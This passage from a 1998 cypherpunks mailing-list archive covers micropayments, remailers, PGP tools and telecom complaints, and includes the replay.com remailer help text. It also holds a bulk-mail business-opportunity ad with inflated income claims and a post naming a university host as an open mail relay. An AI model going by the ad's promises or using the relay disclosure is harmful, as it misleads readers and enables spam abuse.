The boy's barrister, Arend Slink, said the court case had set a
precedent under the new gun laws. Toy cap guns could no longer be
classed as prohibited weapons, he said.
"If there is any sinister intent there are a range of serious charges
that a person could be charged with. "Mr Slink" said"But in the case of
a child possessing a toy cap gun a precedent has now been clearly set".
The Sunday Telegraph reported on May 24 the boy could face jail if found
guilty of the swrioud gun charges, which included:
# Being a non-prohibited person did possess/carry a handgun which was
not registered. 
# Being a non-prohibited person did possess/ carry a handgun which ge
did not have a licecnce for under part two of the Firearms Act 1996.
# Did own a handgun whilst not authorissed by a licence under the
Firearms Act 1996 to possess a firearm.
Police had alleged the toy gun was consedered an imitation firearm inder
strict new gun laws and therefore deemed to be a prohibited weapon.
The toy gun bought by the boy is one of thousands soldacross the state. 
The boy said he had bought the toy cap gun with pocket money.
THE END.
------------------------------------------------------------------------ 
View Democrat Firearm Policy
www.ssaa.org.au/dempolicy.html
Print, copy and distribute.


===================END FORWARDED MESSAGE===================


Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Sun, 27 Sep 1998 23:20:13 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Cypherpunks defeat?
In-Reply-To: <3.0.3.32.19980927223248.03463a7c@mail.atl.bellsouth.net>
Message-ID: <3.0.3.32.19980928002239.03be06bc@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



At 08:43 PM 9/27/98 -0700, James A. Donald wrote:

>IBM is proposing that anyone, or many people, will be free to
>act as issuers of promises to pay in their proposed microcash
>system.  

I don't think you gave a URL for the IBM system.  Since you got me
interested, I went and looked at the "MilliCent" branded product from
Digital/Compaq.

	http://www.millicent.digital.com/

Millicent is currently free in that scrip is not cash.  I have to laugh in
that MilliCent has a granularity of 1/10 of a penny.  So why call it
millicent?

It looks like millicent could be used to pay for web based sending of
anonymous messages, but only if you have an NT server (or use theirs) and
only if you browse from windows.

Maybe if I find a millicent type system that works with a Linux server,
especially a "non money" one, I might setup a web based mailer that works
with it.  It would make a nice weekend project.  I'm been thinking of
revamping the dragoncon.net mailer anyway.


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marky <washington@bluewin.ch>
Date: Sun, 27 Sep 1998 13:36:51 +0800
To: cypherpunks@toad.com
Subject: Mailing-List
Message-ID: <360F45F2.5DD1@bluewin.ch>
MIME-Version: 1.0
Content-Type: text/plain



Please email me information about your mailing-list.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 27 Sep 1998 18:27:45 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <199809272330.BAA12818@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Sunday, September 27, 1998 - 23:06:35 MET

First of all I want to say that the last posting I
did to cypherpunks@cyberpass.net did not reach
the intended recipients.

And two,  

> Subject: Remailers, PGP, and a Project Suggestion   
> Date: Sun, 27 Sep 1998 20:50:36 +0200
> From: Anonymous <nobody@replay.com>
> To: cypherpunks@cyberpass.net

> Unfortunately, much to the delight of the 
> government, the people who would code such 
> a thing are probably in the U.S. like I am.

I would be more than glad to do the coding. I am
not in the US. However, the only thing that stops
me is the fact that I just don't know enough 
programming.


        




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 27 Sep 1998 21:28:01 +0800
To: cypherpunks@Algebra.COM
Subject: please help
Message-ID: <199809280230.EAA27973@replay.com>
MIME-Version: 1.0
Content-Type: text/plain





http://www.angelfire.com/ok/ProveIt/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Sun, 27 Sep 1998 14:53:15 +0800
To: cypherpunks@Algebra.COM
Subject: Re:
Message-ID: <8b290243deab0d40b2006a5aaf21f9e9@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



On 27 Sep 1998, Anonymous wrote:

>
> Paul is coming from AOL using Netscape as a mailer and using the
> open relay at cesvxa.ces.edu.

He's admitted this at least once in a sidebar on a message, as I seem to
recall, so it's nothing new. It does go to show conflict of interest, and
it could be claimed that he's trying to make himself feel better, I
suppose.

Looking back, he's used AOL for most of his postings, except for one I
came across which apparently came from an admin machine at ces.edu, so he
isn't exploiting some random open relay somewhere. Generally they all
route through ces.edu.

I can't speak for Paul, but I figure that he's probably doing what he once
said that he is, and using a modem link to AOL, using AOL for a routing
service, then routing mail through the relay at CES. I don't know why
someone would want to do that if they're sitting on a university network,
but it doesn't matter much.

I just checked: the relay does appear to be an open relay. I just hope
spammers don't wind up finding out which, of course, they probably will
after that post.

Can we have some signal somewhere, please?
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sun, 27 Sep 1998 17:50:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Why do we need remailers, anyway?
In-Reply-To: <20463d5af58cdf2759d132cedbdcfa02@anonymous>
Message-ID: <3.0.5.32.19980928085236.008348b0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 02:25 AM 9/27/98 -0700, Anonymous wrote:
>
>Hello? This is an old topic, but what the heck...
>
>There is a concept cypherpunks have called "Blacknet", which is an
>organisation that sells profiles of prospective employees based on
>their public comments on the Internet.
>
>This allows employers to filter out undesirables who might or might
>not have outgrown their rebellious youth. (You can never be too safe!) 
>
>Now, there are laws making discrimination illegal. But it's hard to *prove*
>that an employer based its decision on BlackNet files, isn't it....
>
>The cypherpunk philosophy is to rely on technology to solve the problem,
rather
>than rely on the government (or anyone else). Cypherpunks write code.
>
>-- an anonymous aol32 user.
>

You would seem to defend the First Adulterer/Purjurer, you question why I
call him this, but you don't want your employer to know that you support
the existing regime?

Yours is a curious blend of half-truths and inane justifications, with a
little in-your-face spitefulness.

As someone else pointed out, even this thread is a secondary issue.
I'm recycling the electrons you sent to me.

Reeza!

"...The world was on fire, but no one could save me but you...
	Strange what desire will make foolish people do...
		(and the background vocalists sang)
			This world is only gonna break your heart...."

					==C.I.==




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 27 Sep 1998 23:59:18 +0800
To: "Robert A. Costner" <cypherpunks@cyberpass.net
Subject: Re: Cypherpunks defeat?
In-Reply-To: <199809280358.UAA27338@proxy3.ba.best.com>
Message-ID: <199809280459.VAA16677@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 08:43 PM 9/27/98 -0700, James A. Donald wrote:
> > IBM is proposing that anyone, or many people, will be
> > free to act as issuers of promises to pay in their
> > proposed microcash system.  

At 12:22 AM 9/28/98 -0400, Robert A. Costner wrote:
> I don't think you gave a URL for the IBM system. 

http://www.hrl.il.ibm.com/mpay 

> Since you got me interested, I went and looked at the
> "MilliCent" branded product from Digital/Compaq.
>
>	http://www.millicent.digital.com/
>
> Millicent is currently free in that scrip is not cash.  I
> have to laugh in that MilliCent has a granularity of 1/10
> of a penny.  So why call it millicent?
>
> It looks like millicent could be used to pay for web based
> sending of anonymous messages, but only if you have an NT
> server (or use theirs) and only if you browse from windows.
>
> Maybe if I find a millicent type system that works with a
> Linux server, especially a "non money" one, I might setup a
> web based mailer that works with it.  It would make a nice
> weekend project.  I'm been thinking of revamping the
> dragoncon.net mailer anyway.

What we really need is an open standard with very fine
potential granularity and the intermediary capabilities of
Microsoft.

Such a project is quite large. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     zRXCi1S3PQe8A82QKJfHfUZKc6zitJTY6L/I82Tu
     4VsX/hdqg717QA4khZefRZ8nu2RJD3DzKv9ZNLjdK
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Mon, 28 Sep 1998 02:19:47 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Cypherpunks defeat?
In-Reply-To: <199809280358.UAA27338@proxy3.ba.best.com>
Message-ID: <Pine.LNX.3.96.980928012305.4314B-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 27 Sep 1998, James A. Donald wrote:

> We really need an open system, which IBM is not, which goes
> down to millicent values, which IBM does not, and which
> supports intermediaries moving aggregated transactions, so
> that customer and server to not have to be clients of the
> same intermediary, which IBM does support, and previous
> proposals for micropayment did not.
> 
>     --digsig
>          James A. Donald

Sound like we need something like a GPL for digital cash
protocols/algorithms.

That would keep it from being monopolized by a few power
players.

Someone has to be working on this.

jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mark@unicorn.com
Date: Mon, 28 Sep 1998 10:35:11 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Remailers, PGP, and a Project Suggestion
Message-ID: <906997039.10013.193.133.230.33@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous apparently informed the cypherpunks:
>What UNIX really needs is some kind of mailer which integrates an updated
>premail, PGP 2.x support, and PGP 5.x support. Unfortunately, much to the
>delight of the government, the people who would code such a thing are
>probably in the U.S. like I am.

Privtool (http://www.unicorn.com/privtool/privtool.html) already provides
PGP 2.x support, mixmaster support and limited premail support; I'll add
PGP 5.x or OpenPGP when I have a Linux machine again.

    Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Mon, 28 Sep 1998 09:45:02 +0800
To: cypherpunks@toad.com
Subject: Wanted: Twofish source code
Message-ID: <199809281429.JAA12328@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



I am looking for Twofish ports in other assembly languages and other
high-level languages.  If anyone has, or is willing to write, source code
that they will put in the public domain, I would like to talk with them.

Thanks,
Bruce 
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Mon, 28 Sep 1998 10:08:49 +0800
To: "'cypherpunks@einstein.ssz.com>
Subject: Mild anti-phone-company rant
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8456@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Why worry about mere governments when the phone company can ru(i)n your
life? 

BT AKA  British Telecom were reported on the BBC radio over the weekend
to be using their customer's account records to poach business from
Internet service providers.  Sales staff searched for customers who
frequently dialled known ISP numbers. They then tried to sell them BT's
Internet service (imaginitively branded as "BT Internet") 

A bit of a marketing advantage that, knowing exactly who your mark
phoned, when and for how long.  What's next? Maybe BT Pizza will try
contacting heavy users of Domino. Or BT Hot and Horny will send
brochures in plain covers to subscribers who phone certain numbers
apparently in Grenada or Chile  (Not that I would ever call such numbers
but a friend of mine was surprised to find so many Manchester accents in
Latin America...)

UK government's response to all that is at
http://www.coi.gov.uk/coi/depts/GOT/GOT.html  - which will also tell you
about the way BT overcharges independent  payphone operators and rakes
off money whenever you call a mobile phone. 

http://news.bbc.co.uk/hi/english/uk/newsid%5F181000/181800.stm says how
Kent police are doing a deal with BT so that the phone company will
withdraw service from people who make too many frivolous 999 calls
(emergency number - like the US 911 - but a lot easier to key in when
your room is  full of smoke). So if the police don't like you they can
ask BT to cut off your phone and they just will?

And if you think I've got it in for BT at least they seem to be  more
competent than their main rivals in the UK market,  inCapable and
Witless (did I spell that right?) for whom I spent a day and a half
waiting at home last week, instead of at work. On Thursday  I was there
for hours for one man to come in, stick something into a wall port, see
that it lit up (I could have told him that the connection to the switch
worked) and give me a piece of paper to sign, telling me that they had
connected my phone to the WRONG NUMBER  which, after I had called them
to ask for my own phone number back got disconnected entirely.  On
Friday they didn't turn up at all. Totally wasted day.  And I currently
have neither phone nor cable TV services, and haven't had for THREE
WEEKS. And they had the temerity to send me a bill - even if it was only
for 4.45.

I think I should charge them for my wasted time. Maybe I should ask for
consultancy rates.  But I suppose if I demanded more than a year's phone
bill off them they'd soon decide they dindn't have to supply me with
service at all.  Nuts.

There must be a cheap way to get online without dealing with phone
companies. They seem to combine the entrepreneurial spirit of the civil
service with the humility of the banks and the dedication to customer
choice of Microsoft and IBM.

This mail is entirely my own private opinion and nothing at all to do
with my employers who probably wouldn't approve of it in the unlikely
event that they ever noticed it.  Despite the fact that I am using their
Internet connection to send it.  Of course I could always have sent it
from home via my ISP. Or I could have  IF I HAD A BLOODY PHONE LINE THAT
BLOODY WELL WORKED.

Ken Brown




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 28 Sep 1998 12:13:32 +0800
To: cypherpunks@cyberpass.net
Subject: Blacklisted spam victim wants his day in court (fwd)
Message-ID: <Pine.GSO.3.95.980928101445.2069B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Mon, 28 Sep 1998 10:14:38 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: Blacklisted spam victim wants his day in court


http://cgi.pathfinder.com/netly/0,2326,201980928-14646,00.html

TIME Digital's Netly News
September 28, 1998 

   Blacklisted Spam Victim Wants His Day in Court 
   By Declan McCullagh (declan@well.com)
                                         
   When Craig Harmer got spammed, he did what all of us should do: he
   fired off a nasty email to the perp and the perp's Internet provider.
   "I was trying to get his web site connectivity yanked," says Harmer, a
   35-year old Unix programmer who didn't really think much of it at the
   time. But the spammer remembered. Harmer says someone named Michael
   Reed was behind the bulk email, and accuses Reed of retaliating by
   using Harmer's Internet site as a mail relay, pumping megabytes of
   forged sex spam through it and letting Harmer take the rap.

   [...remainder snipped...]
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: emailking.associates@cwix.com
Date: Wed, 30 Sep 1998 08:41:59 +0800
To: <cypherpunks@einstein.ssz.com>
Subject: advertisement
Message-ID: <199809301343.IAA11432@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



This Message was Composed using Extractor Pro '98 Bulk E- Mail 
Software. If 
you wish to be removed from this advertiser's future mailings, 
please reply 
with the subject "Remove" and this software will automatically 
block you 
from their future mailings.

The person who chooses to try something and fails is a far 
greater person than the person
who chooses to try nothing and succeeds!

The difference between the successful person and the unsuccessful 
person is that the successful 
person is willing to do that which the unsuccessful person is 
not!

If you are looking to dable or window shop, this is not for you. 
Please do not respond to this message
 unless you know you have what it takes and you are truly willing 
to put in the effort to become
 successful. This Business Opportunity is for the person who is 
serious about making money, 
controling their schedule, reducing their tax liability and 
becoming financially independent!

Believe it or not the majority of people are not truly committed 
to making the financial and time 
committment it takes to achieve financial independence.  The 
question is.... are you?

If you are, you will never find a business opportunity that 
offers such a high return on your time and 
dollar investment, than we are offering here.


No Risk Guarantee!      -     Prospects Call You!

Not MLM!          Honest, Ethical Business!

See why heavy hitters are leaving there Multi-level programs 
forever.

With DESIRE & EFFORT.... YOU ABSOLUTELY CANNOT FAIL!

$8,000 - $10,000 first 4 to 8 weeks!

All you need is a telephone,  fax machine and the passion to 
succeed.

Would you take 2 minutes to find out how! CALL NOW!!!

1-800-781-7046 ext.6053
Only serious inquiries please.

I have been involved in this business for only 5 weeks and I 
cannot believe the income! I am this 
coming week ending a twenty year career.  My wife and family love 
it. They will see me more than 
ever. I've been in several MLM's and experienced moderate 
success. This is not MLM. It is a 
legitamate turn-key business with an outstanding product, 
unbelievable compensation structure, lead 
generation system and I have all the qualified leads than I can 
contact every week! The support and
 training are fantastic!
 
You owe it to yourself and your family to check it out.
Sincerely,
Jim

1-800-781-7046 ext.6053

If you do not wish to receive this message hit "reply" and type 
"remove" in the subject line and you
will atomatically be removed from future mailings. Sorry if this 
was an inconvenience to you.





to be removed type "remove" in the subject header and e mail back 
emailking.associates@cwix.com

sent e mail king and associates
1790 bonhill rd
mississauga on
l5t 1e1
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <remailer@replay.com>
Date: Mon, 28 Sep 1998 04:13:22 +0800
To: cypherpunks@toad.com
Subject: Information about the Anonymous
Message-ID: <199809280909.LAA17361@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



This message is being sent to you automatically in reply to the message
you sent to remailer@replay.com with the subject "remailer-help".

There is an automated mail handling program installed on this account
which will take any message with the proper headers and automatically
re-send it anonymously.

It is capable of providing a very high level of security if you use the
Mixmaster software to produce the messages.  You can get the Mixmaster
client software from <http://www.thur.de/ulf/mix/> (Germany).  Please
read its manual page and README file for usage instructions.

More information about anonymous remailers is available at
<http://www.stack.nl/~galactus/remailers/>.

For an up-to-date listing of anonymous remailers with statistics,
see <http://anon.efga.org/anon/rlist.html>.  You can also get the
list by fingering rlist@anon.efga.org or rlist@anon.lcs.mit.edu.

You can use the remailer by sending mail to remailer@replay.com, with the
header "Anon-To: address", the address that you want to send anonymously
to.  If you can't add headers to your mail, you can place two colons on
the first line of your message, followed by the "Anon-To:" line.  Follow
that with a blank line, and then begin your message.  For example:

================================================================
From: joe@site.com
To: remailer@replay.com
Subject: Anonymous Mail

::
Anon-To: beth@univ.edu

This is some anonymous mail.
================================================================


The above would be delivered to beth@univ.edu anonymously.  All headers in
the original message are removed.  She would not know that it came from
Joe, nor would she be able to reply to the message.  However, there are a
few ways that the true identity of the sender could be found.  First, if
many anonymous messages were sent, someone could compare the times that
the messages were sent with the times that 'joe' was logged in.  However,
this can be prevented by instructing the remailer to delay the message, by
using the "Latent-Time:" header:

================================================================
From: joe@site.com
To: remailer@replay.com
Subject: Anonymous Mail

::
Anon-To: beth@univ.edu
Latent-Time: +1:00

This is some anonymous mail.
================================================================

The message would be delayed one hour from when it is sent.  It is also
possible to create a random delay by adding an 'r' to the time (+1:00r),
which would have the message be delivered at a random time, but not more
than an hour.  You can also delay the message until a specific time.
For example, "Latent-Time: 0:00" without the '+' would delay the message
until midnight (at the remailer site).  Times must be in 24-hour format.

NOTE: This remailer automatically reorders messages in a large pool,
which produces a similar effect.


Another problem is that some mailers automatically insert a signature file.
Of course, this usually contains the sender's e-mail address, and so would
reveal their identity.  The remailer software can be instructed to remove
a signature file with the header "Cutmarks:".  Any line containing only the
cutmark characters, and any lines following it will be removed.

================================================================
From: sender@origin.com
To: remailer@replay.com

::
Anon-To: recipient@destination.com
Cutmarks: -- 

This line of text will be in the anonymous message.
-- 
This line of text will not be in the anonymous message.
================================================================

NOTE: The cutmark characters in the example are "-- ", the usual e-mail
signature separator.  If you forget the trailing blank after the "--"
in the "Cutmarks:" directive, your signature won't be cut off.


Sometimes you want a subject line or other headers in your anonymous
message.  Additional headers can be written to the output message by
preceding them with a "##" line.  Multi-line headers with indented
continuation lines are allowed.

================================================================
From: chris@nifty.org
To: remailer@replay.com

::
Anon-To: andrew@where-ever.org

##
Reply-To: chris@nifty.org
Subject: A message with user-supplied headers: the subject extends
	over two lines

Hi there!
================================================================


The remailer can also be used to make anonymous posts to Usenet.
To do this, send a message with the header "Anon-Post-To: newsgroups",
the newsgroups that you want to post anonymously to.  Please note
that the group names must be separated by commas (but NO spaces).

================================================================
From: poster@origin.com
To: remailer@replay.com

::
Anon-Post-To: alt.test,misc.test

##
Subject: Anonymous Post

This is an anonymous message.
================================================================

When posting test messages, please use the appropriate groups (alt.test,
misc.test).  The remailer support newsgroup alt.privacy.anon-server is
not a test group.  A subject is needed for Usenet postings.  The remailer
writes a "Subject: none" header to the output message if you don't add
your own subject.

In order to post an anonymous follow-up article and have it appear in a
thread, you must set the "Subject:" and "References:" headers of your
message correctly.  The explanation below has been adapted from the
nym.alias.net help file (mailto:help@nym.alias.net).

The subject of your message should be the same as the article to which you
are replying, unless you are replying to the first message in a thread, in
which case you should prepend "Re: " to the original subject.

To build a references header, copy the references header of the article to
which you are replying, and append that article's Message-ID.  If you are
replying to the first article of a thread, it won't have a references header.
In that case just use the article's Message-ID as your references header.
Be sure to leave a space between Message-IDs in your references heder.
For example, if replying to a message which includes these headers:

================================================================
Newsgroups: alt.privacy.anon-server
Subject: Re: anonymous remailers
References: <5dfqlm$m50@basement.replay.com>
Message-ID: <5dko56$1lv$1@news02.deltanet.com>
================================================================

your anonymous follow-up message should begin with these lines:

================================================================
::
Anon-Post-To: alt.privacy.anon-server

##
Subject: Re: anonymous remailers
References: <5dfqlm$m50@basement.replay.com>
	<5dko56$1lv$1@news02.deltanet.com>
================================================================

[Note that an indented line in a message header indicates a continuation
of the previous line.]  If replying to the first message in a thread,
with these headers:

================================================================
Newsgroups: alt.privacy.anon-server
Subject: Help with PGP
Message-ID: <5e96gi$opv@job.acay.com.au>
================================================================

your reply should begin with these lines:

================================================================
::
Anon-Post-To: alt.privacy.anon-server

##
Subject: Re: Help with PGP
References: <5e96gi$opv@job.acay.com.au>
================================================================

The "References:" header can be trimmed to include only IDs from messages
that you have quoted from or are replying to.


By separating messages with cutmarks, you can send more than one message
at once:

================================================================
From: me@mysite.org
To: remailer@replay.com
Subject: whatever

::
Anon-To: recipient1@site1.org
Cutmarks: -- 

##
Subject: message 1

Message one.
-- 
::
Anon-To: recipient2@site2.org
Cutmarks: -- 

##
Subject: message 2

Message two.
-- 
me@mysite.org
================================================================

The two messages will be delivered separately, and the signature will
be removed.  Only one cutmark is used in the example, but you may use
different cutmarks in each part of your message if necessary.


For added security, you can encrypt your messages to the remailer with
PGP. The remailer software will decrypt the message and send it on.
Here is the remailer's public key:

Type Bits/KeyID    Date       User ID
pub  1000/E7AEC1E5 1995/05/23 Replay Remailer Service <remailer@replay.com>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQCKAy/Bo9QAAAED6NMBE5oNGLqUmZvUZTWBfL41B67EVtDHu5VmqrPLX6w0gk8U
lPUNlW/1wACNQAFs/hxKKd0B15d8R7Qk1X7H1KPsdF9AAp8DIBe3MN59Z8iO1dYB
GW8YhPg2EXnNAZyVQb/CGhDZhm8naq3wsQynZZu4J7DmVD0VsrLnrsHlAAURtC1S
ZXBsYXkgUmVtYWlsZXIgU2VydmljZSA8cmVtYWlsZXJAcmVwbGF5LmNvbT6JAJID
BRAvzinRPRWysueuweUBAVpyA+dmx166/op40+nr9OQjahqWHdvLYkKipanaLNM4
u0/U8RrkySEj5n/R0zaJSG4mutZ28DqUEhz7rBHrFRYleENRtiI9TxZZrJVWInE9
No7VwSW9jWlpta2rCfu97EWLdPVPLXmXpd90TONHMk8a7sf/Lz5JFWIIK5PSqI/Z
xQ==
=5+RC
-----END PGP PUBLIC KEY BLOCK-----

To utilize this feature, create a message with two colons on the first line,
then the "Anon-To:" or "Anon-Post-To:" header, then any other commands such
as "Cutmarks:" or "Latent-Time:", then a blank line, then the optional "##"
line and your additional headers, then a blank line, and then the body of
your message.  Encrypt this with the remailer's public key.  Then send it
to the remailer, adding the header "Encrypted: PGP".  If you forget this,
the remailer won't know that it needs to be decrypted.  Also be sure to use
the "-t" option with PGP, or the linefeeds might not be handled properly.

================================================================
From: me@mysite.org
To: remailer@replay.com

::
Encrypted: PGP

-----BEGIN PGP MESSAGE-----
Version: 2.6.3in

hIwCJD7BWgsRsnUBA/9kVuVlhFczhjI5cYFLGEAQiv4fUUlZ+hgPp6SQysToVLTM
d0OvWqEb4TJgMREf6pHv4022yRLV6Pb9xaE/Gb82SUZYNE6TvfpxyKbWtRSthPXx
OlsLD+IudqvBQus6DoY/9ClbbXyibP6mOCy7gwFZWOy6OMv2O2ZI3ufc/iCpgKYA
AAAoLD7rvsI+c/Bod/GKAffpHqN2fimsoXrdcEMhIfN+rSC7PnMmaX1c4w==
=afKM
-----END PGP MESSAGE-----
================================================================

To confuse possible attackers even more, you can generate some cover
traffic by sending encrypted messages with the special "Null:" header
rather than the usual "Anon-To:" or "Anon-Post-To:" headers.  The
remailer will drop these messages in the bit bucket.


Any text after your encrypted remailer message is also remailed.  This
allows sending messages to someone who is anonymous.  If you create a
PGP-encrypted message to yourself via this remailer, and then give it
to someone, they can send you a message by sending the encrypted message
to the remailer.  The remailer will then decrypt it and send it to you.
The message gets anonymized in the process, so the sender will need
to include a return address if he wants a reply.

Messages sent this way can be encrypted using the "Encrypt-Key:" feature.
Any text following a line beginning with "**" will be encrypted with this
key.  For example, if you put in the plaintext of your PGP message:

================================================================
::
Anon-To: you@yourhost.org
Encrypt-Key: your_password

**
================================================================

The appended message after the "**" will be encrypted with the key
"your_password", using PGP's conventional encryption option.
It is much simpler to manage these "reply blocks" -- both from the
sender's and recipient's perspective -- by using a nymserver.
Please read <http://www.publius.net/n.a.n.html> for more information
(the homepage for nym.alias.net, the home of the nymserver software).


For greatest untraceability, your reply block can be directed to post
to alt.anonymous.messages on Usenet.  Since you must use a subject line
when posting to Usenet, messages sent using the same reply block will
have the same subject.  To avoid this, you can encrypt a message digest
of the subject using the "Encrypt-Subject:" feature.  For example, if
you put inside your reply block:

================================================================
::
Anon-Post-To: alt.anonymous.messages
Encrypt-Key: your_password
Encrypt-Subject: your_other_password

##
Subject: This subject is MD5 hashed and IDEA encrypted

**
================================================================

The subject will be converted to a 128-bit number and encrypted
with IDEA using CFB mode with the key "your_other_password", and
printed in hexadecimal format (48 characters); and the message will
be posted to alt.anonymous.messages.  The original subject cannot
be recovered, only the MD5 hash of it, and then only if you have the
password.  The resulting subject will be different each time due to
the use of CFB mode, so this helps prevent traffic analysis based on
the subject header.

Decoding the subject (to verify that the message is directed to you)
requires special software.  A small C program which can do this is
part of the remailer distribution, but a more robust application would
be appreciated.  You can get the remailer source code as ASCII-armored
Unix TGZ archive by sending mail to remailer-source@squirrel.owl.de.


Abuse Policy:
I consider the following to be inappropriate use of this anonymous remailer,
and will take steps to prevent anyone from doing any of the following:
- Sending messages intended primarily to be harassing or annoying.
- Use of the remailer for any illegal purpose.  Due to the global nature
  of the Internet, it is the sole responsibility of the orginal sender
  to determine what is legal.
- Unsolicited commercial messages (SPAM).
- Complaints to spammers.
- Posting lists of addresses to Usenet groups for purposes of soliciting
  commercial e-mail (spam-baiting).

Spammers will be exposed, publicly humiliated, and billed whenever possible.

If you don't want to receive anonymous mail, send a message to the operator,
and your address will be added to the block list.  For more information on
filtering out unwanted e-mail, see <http://www.abuse.net/>.


You can get a list of statistics on remailer usage by sending mail to
the remailer with Subject: remailer-stats


To get the remailer's public keys, send mail with Subject: remailer-key
or finger rlist-keys@anon.efga.org or remailer-keys@anon.lcs.mit.edu to
get the public PGP keys of all active Cypherpunk remailers.


For a copy of these instructions, send mail with Subject: remailer-help

To reach the operator, direct your mail to abuse@replay.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 28 Sep 1998 10:31:52 +0800
To: Digital Bearer Settlement List <cypherpunks@cyberpass.net
Subject: Re: Cypherpunks defeat?
Message-ID: <v04011714b2355c5105ab@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded with Andrew's permission...

Cheers,
Bob Hettinga

--- begin forwarded text


Date: Mon, 28 Sep 1998 09:15:48 -0400 (EDT)
From: Andrew Odlyzko <amo@research.att.com>
To: rah@shipwright.com
Subject: Re: Cypherpunks defeat?

Bob,

Concerning the recent posting by Jim Donald about micropayments,
let me say that as a co-inventor of a micropayment scheme
(presented at the FC'97 conference) I do see a role for them.
However, I do think it will be a limited role.  The reason
is economic.  It is not just that people don't want to be
"nickeled and dimed."  A more substantive reason is that in
most situations the content producers can get more money
from aggregating content.  I have analyzed this in papers
such as

The bumpy road of electronic commerce, in "WebNet 96 - World
Conf. Web Soc. Proc.," H. Maurer, ed., AACE, 1996, pp. 378-389.

and

Fixed fee versus unit pricing for information goods: competition,
equilibria, and price wars, P. C. Fishburn, A. M. Odlyzko, and
R. C. Siders, First Monday 2(7) (July 1997), http://www.firstmonday.dk/.
Also to appear in "Internet Publishing and Beyond: The Economics of
Digital Information and Intellectual Property," D. Hurley, B. Kahin,
and H. Varian, eds., MIT Press, 1998.

Both are available at

  http://www.research.att.com/~amo/doc/eworld.html

Best regards,
Andrew


************************************************************************
Andrew Odlyzko                                      amo@research.att.com
AT&T Labs - Research                                voice:  973-360-8410
http://www.research.att.com/~amo                    fax:    973-360-8178
************************************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lazlo Toth <lazlototh@hempseed.com>
Date: Mon, 28 Sep 1998 11:25:57 +0800
To: Jim Choate <users@einstein.ssz.com (SSZ User Mail List)
Subject: Re: GNUcash [/.]
In-Reply-To: <199809280200.VAA05655@einstein.ssz.com>
